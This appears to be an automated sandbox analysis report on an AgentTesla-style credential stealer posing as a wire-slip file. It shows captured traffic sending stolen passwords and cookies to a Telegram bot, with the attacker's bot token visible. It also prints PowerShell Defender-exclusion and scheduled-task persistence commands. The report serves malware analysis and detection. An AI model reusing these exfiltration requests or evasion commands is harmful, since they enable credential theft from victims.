2024-11-21 10:02:11 UTC	1022	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 21 Nov 2024 10:02:11 GMT Content-Type: application/json Content-Length: 634 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":1190,"from":{"id":7180778750,"is_bot":true,"first_name":"Newman$","username":"Newman101_bot"},"chat":{"id":5968311109,"first_name":"New","last_name":"Man","type":"private"},"date":1732183331,"document":{"file_name":"user-226546 2024-11-21 05-02-07.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIEpmc_BSMJiwKyCPbEToCjASXmqWy5AAIcFgACPvP4UeWrz1MmDW7UNgQ","file_unique_id":"AgADHBYAAj7z-FE","file_size":319},"caption":"New PW Recovered!\n\nTime: 11/21/2024 05:02:07\nUser Name: user/226546\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49740	149.154.167.220	443	7432	C:\Users\user\Desktop\Wire slip account payable.pif.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 10:02:13 UTC	237	OUT	POST /bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd0a0b1ada11a6 Host: api.telegram.org Content-Length: 3951 Expect: 100-continue
2024-11-21 10:02:13 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 61 30 62 31 61 64 61 31 31 61 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 39 36 38 33 31 31 31 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 61 30 62 31 61 64 61 31 31 61 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 4f 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 31 2f 32 31 2f 32 30 32 34 20 30 39 3a 30 31 3a 33 36 0a 55 73 65 72 Data Ascii: -----------------------------8dd0a0b1ada11a6Content-Disposition: form-data; name="chat_id"5968311109-----------------------------8dd0a0b1ada11a6Content-Disposition: form-data; name="caption"New CO Recovered!Time: 11/21/2024 09:01:36User
2024-11-21 10:02:13 UTC	2877	OUT	Data Raw: 6f 69 64 63 09 46 41 4c 53 45 09 31 33 33 34 30 38 38 37 37 33 35 33 35 39 33 33 34 09 2e 41 73 70 4e 65 74 43 6f 72 65 2e 4f 70 65 6e 49 64 43 6f 6e 6e 65 63 74 2e 4e 6f 6e 63 65 2e 43 66 44 4a 38 4b 69 75 79 5f 42 35 4a 67 46 4d 6f 37 50 65 50 39 35 4e 4c 68 71 77 63 4a 38 6b 6f 44 79 35 70 58 6b 66 6f 57 73 62 35 53 62 62 55 32 68 56 43 62 73 48 32 71 74 39 47 46 5f 4f 56 43 71 46 6b 4c 45 77 68 76 7a 65 41 44 4e 51 4f 46 35 52 53 6d 6b 44 66 68 35 52 71 66 71 6c 4f 6b 78 35 51 57 6f 34 4c 6c 74 76 77 62 30 43 76 77 42 46 44 38 75 6a 6c 6d 33 42 41 67 6c 4f 65 47 63 61 33 5a 61 74 6b 4c 4d 55 6b 48 42 36 61 6c 61 68 55 72 38 71 4a 37 47 5f 33 41 65 6a 74 6f 6f 79 6d 54 57 43 7a 79 4f 38 39 68 73 68 4a 65 58 38 47 68 37 38 6b 6f 68 62 49 77 30 49 51 59 Data Ascii: oidcFALSE13340887735359334.AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY
2024-11-21 10:02:13 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 61 30 62 31 61 64 61 31 31 61 36 2d 2d 0d 0a Data Ascii: -----------------------------8dd0a0b1ada11a6--
2024-11-21 10:02:13 UTC	25	IN	HTTP/1.1 100 Continue
2024-11-21 10:02:14 UTC	1023	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 21 Nov 2024 10:02:14 GMT Content-Type: application/json Content-Length: 635 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":1191,"from":{"id":7180778750,"is_bot":true,"first_name":"Newman$","username":"Newman101_bot"},"chat":{"id":5968311109,"first_name":"New","last_name":"Man","type":"private"},"date":1732183334,"document":{"file_name":"user-226546 2024-11-21 09-01-36.txt","mime_type":"text/plain","file_id":"BQACAgQAAxkDAAIEp2c_BSa0xYhJvr8D7PYF5JTBVUf8AAIdFgACPvP4UUodGiY7Ko2DNgQ","file_unique_id":"AgADHRYAAj7z-FE","file_size":3355},"caption":"New CO Recovered!\n\nTime: 11/21/2024 09:01:36\nUser Name: user/226546\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49741	149.154.167.220	443	7856	C:\Users\user\AppData\Roaming\EQVRGq.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 10:02:14 UTC	260	OUT	POST /bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd09e9a859de79 Host: api.telegram.org Content-Length: 915 Expect: 100-continue Connection: Keep-Alive
2024-11-21 10:02:14 UTC	915	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 39 65 39 61 38 35 39 64 65 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 39 36 38 33 31 31 31 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 39 65 39 61 38 35 39 64 65 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 31 2f 32 31 2f 32 30 32 34 20 30 35 3a 30 32 3a 31 31 0a 55 73 65 72 Data Ascii: -----------------------------8dd09e9a859de79Content-Disposition: form-data; name="chat_id"5968311109-----------------------------8dd09e9a859de79Content-Disposition: form-data; name="caption"New PW Recovered!Time: 11/21/2024 05:02:11User
2024-11-21 10:02:14 UTC	25	IN	HTTP/1.1 100 Continue
2024-11-21 10:02:14 UTC	1022	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 21 Nov 2024 10:02:14 GMT Content-Type: application/json Content-Length: 634 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":1192,"from":{"id":7180778750,"is_bot":true,"first_name":"Newman$","username":"Newman101_bot"},"chat":{"id":5968311109,"first_name":"New","last_name":"Man","type":"private"},"date":1732183334,"document":{"file_name":"user-226546 2024-11-21 05-02-11.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIEqGc_BSbmh1bD7bc4Di1i4PPzG4d2AAIeFgACPvP4UUh_m4I-xcqHNgQ","file_unique_id":"AgADHhYAAj7z-FE","file_size":319},"caption":"New PW Recovered!\n\nTime: 11/21/2024 05:02:11\nUser Name: user/226546\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	149.154.167.220	443	7856	C:\Users\user\AppData\Roaming\EQVRGq.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 10:02:16 UTC	237	OUT	POST /bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd0a042708aced Host: api.telegram.org Content-Length: 3951 Expect: 100-continue
2024-11-21 10:02:16 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 61 30 34 32 37 30 38 61 63 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 39 36 38 33 31 31 31 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 61 30 34 32 37 30 38 61 63 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 4f 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 31 2f 32 31 2f 32 30 32 34 20 30 38 3a 31 31 3a 35 30 0a 55 73 65 72 Data Ascii: -----------------------------8dd0a042708acedContent-Disposition: form-data; name="chat_id"5968311109-----------------------------8dd0a042708acedContent-Disposition: form-data; name="caption"New CO Recovered!Time: 11/21/2024 08:11:50User
2024-11-21 10:02:16 UTC	2877	OUT	Data Raw: 6f 69 64 63 09 46 41 4c 53 45 09 31 33 33 34 30 38 38 37 37 33 35 33 35 39 33 33 34 09 2e 41 73 70 4e 65 74 43 6f 72 65 2e 4f 70 65 6e 49 64 43 6f 6e 6e 65 63 74 2e 4e 6f 6e 63 65 2e 43 66 44 4a 38 4b 69 75 79 5f 42 35 4a 67 46 4d 6f 37 50 65 50 39 35 4e 4c 68 71 77 63 4a 38 6b 6f 44 79 35 70 58 6b 66 6f 57 73 62 35 53 62 62 55 32 68 56 43 62 73 48 32 71 74 39 47 46 5f 4f 56 43 71 46 6b 4c 45 77 68 76 7a 65 41 44 4e 51 4f 46 35 52 53 6d 6b 44 66 68 35 52 71 66 71 6c 4f 6b 78 35 51 57 6f 34 4c 6c 74 76 77 62 30 43 76 77 42 46 44 38 75 6a 6c 6d 33 42 41 67 6c 4f 65 47 63 61 33 5a 61 74 6b 4c 4d 55 6b 48 42 36 61 6c 61 68 55 72 38 71 4a 37 47 5f 33 41 65 6a 74 6f 6f 79 6d 54 57 43 7a 79 4f 38 39 68 73 68 4a 65 58 38 47 68 37 38 6b 6f 68 62 49 77 30 49 51 59 Data Ascii: oidcFALSE13340887735359334.AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY
2024-11-21 10:02:16 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 61 30 34 32 37 30 38 61 63 65 64 2d 2d 0d 0a Data Ascii: -----------------------------8dd0a042708aced--
2024-11-21 10:02:17 UTC	25	IN	HTTP/1.1 100 Continue
2024-11-21 10:02:17 UTC	1023	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 21 Nov 2024 10:02:17 GMT Content-Type: application/json Content-Length: 635 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":1193,"from":{"id":7180778750,"is_bot":true,"first_name":"Newman$","username":"Newman101_bot"},"chat":{"id":5968311109,"first_name":"New","last_name":"Man","type":"private"},"date":1732183337,"document":{"file_name":"user-226546 2024-11-21 08-11-50.txt","mime_type":"text/plain","file_id":"BQACAgQAAxkDAAIEqWc_BSmpzrwyOw_hmaBSrjDbI20XAAIfFgACPvP4UchXU_UE9193NgQ","file_unique_id":"AgADHxYAAj7z-FE","file_size":3355},"caption":"New CO Recovered!\n\nTime: 11/21/2024 08:11:50\nUser Name: user/226546\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Target ID:	0
Start time:	05:02:01
Start date:	21/11/2024
Path:	C:\Users\user\Desktop\Wire slip account payable.pif.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Wire slip account payable.pif.exe"
Imagebase:	0x9c0000
File size:	776'200 bytes
MD5 hash:	F3C67CD1BBB9C8A8BCB56EE97C5A7B27
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:02:03
Start date:	21/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Wire slip account payable.pif.exe"
Imagebase:	0xa60000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:02:03
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:02:03
Start date:	21/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EQVRGq.exe"
Imagebase:	0xa60000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:02:03
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:02:03
Start date:	21/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp14C9.tmp"
Imagebase:	0xa60000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	05:02:04
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	05:02:04
Start date:	21/11/2024
Path:	C:\Users\user\Desktop\Wire slip account payable.pif.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Wire slip account payable.pif.exe"
Imagebase:	0x900000
File size:	776'200 bytes
MD5 hash:	F3C67CD1BBB9C8A8BCB56EE97C5A7B27
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.4160419994.0000000002C67000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	05:02:05
Start date:	21/11/2024
Path:	C:\Users\user\AppData\Roaming\EQVRGq.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\EQVRGq.exe
Imagebase:	0x400000
File size:	776'200 bytes
MD5 hash:	F3C67CD1BBB9C8A8BCB56EE97C5A7B27
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 63%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	05:02:07
Start date:	21/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	05:02:08
Start date:	21/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp25B1.tmp"
Imagebase:	0xa60000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	05:02:08
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	05:02:08
Start date:	21/11/2024
Path:	C:\Users\user\AppData\Roaming\EQVRGq.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\EQVRGq.exe"
Imagebase:	0x1a0000
File size:	776'200 bytes
MD5 hash:	F3C67CD1BBB9C8A8BCB56EE97C5A7B27
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	05:02:08
Start date:	21/11/2024
Path:	C:\Users\user\AppData\Roaming\EQVRGq.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\EQVRGq.exe"
Imagebase:	0xc10000
File size:	776'200 bytes
MD5 hash:	F3C67CD1BBB9C8A8BCB56EE97C5A7B27
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.4160006353.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.4160006353.00000000030BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.4160006353.00000000030C5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	12.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	124
Total number of Limit Nodes:	9

Executed Functions

Function 0749CFF9 Relevance: .4, Instructions: 401COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 050eb2d37d62136332ad29d22815ac10fcb9b191b2f58cb5628c7c47227f00fe
Instruction ID: 94941471417cd293e80d6177bb9954a1c025520f813075f2fdbb1bcbd81ba8a2
Opcode Fuzzy Hash: 050eb2d37d62136332ad29d22815ac10fcb9b191b2f58cb5628c7c47227f00fe
Instruction Fuzzy Hash: 08E199B1B012069FDF29DB75C560BAFBBFAAF89200F14446AD5469B391DB34E801CB61

Function 0749B479 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37f76cac625b6dfb9a36fbfcfbed0e7944a90a8043fd4c44a0bf4c7021642e5c
Instruction ID: 1d61205233434f8a5170f9f64c9e5c13b42d8216dd0c163d27854eaebb0bd1e1
Opcode Fuzzy Hash: 37f76cac625b6dfb9a36fbfcfbed0e7944a90a8043fd4c44a0bf4c7021642e5c
Instruction Fuzzy Hash: 72D017F4C2D244CFCB509F64A4586F9BABCDB47205F0924BB894EA7A02D1248501CA1A

Function 0155CF90 Relevance: 6.1, APIs: 4, Instructions: 130
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0155D01E
GetCurrentThread.KERNEL32 ref: 0155D05B
GetCurrentProcess.KERNEL32 ref: 0155D098
GetCurrentThreadId.KERNEL32 ref: 0155D0F1

Memory Dump Source

Source File: 00000000.00000002.1739210473.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1550000_Wire slip account payable.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: ff2a928b3e63c64abe8812d57c516de27a2956b5ad77173e9a65406d4a2d512d
Instruction ID: 3d8b9e004fb2f29731f444e30ba17065a9380cfb38853ccc65386df9a86563d3
Opcode Fuzzy Hash: ff2a928b3e63c64abe8812d57c516de27a2956b5ad77173e9a65406d4a2d512d
Instruction Fuzzy Hash: D05175B19013498FDB54DFA9D548BDEBBF1BF48304F20889AD448AB260E7349885CF65

Function 0155CFA0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0155D01E
GetCurrentThread.KERNEL32 ref: 0155D05B
GetCurrentProcess.KERNEL32 ref: 0155D098
GetCurrentThreadId.KERNEL32 ref: 0155D0F1

Memory Dump Source

Source File: 00000000.00000002.1739210473.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1550000_Wire slip account payable.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: baa3b186ba999f2935eebc77ebbb7ac070f6cd89c7c902fc7591a1e1f0dd73fc
Instruction ID: d0f5055fb2538e7361061b19df32c527ff7f9866a4e7b1d198d39cfeb0621225
Opcode Fuzzy Hash: baa3b186ba999f2935eebc77ebbb7ac070f6cd89c7c902fc7591a1e1f0dd73fc
Instruction Fuzzy Hash: E25165B19013098FDB54DFA9C548BDEBBF1BF88314F208859E408AB260E734A885CF65

Function 07497F65 Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 074981A6

Memory Dump Source

Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: c999ac46ff7f1b35d11c800ac81e458de698624bcd909ecb7d4153c16ea21347
Instruction ID: 4addd57f7840714daf1ac77ff7987e2b33c08e39cb8515462c9baa52ca71d2e5
Opcode Fuzzy Hash: c999ac46ff7f1b35d11c800ac81e458de698624bcd909ecb7d4153c16ea21347
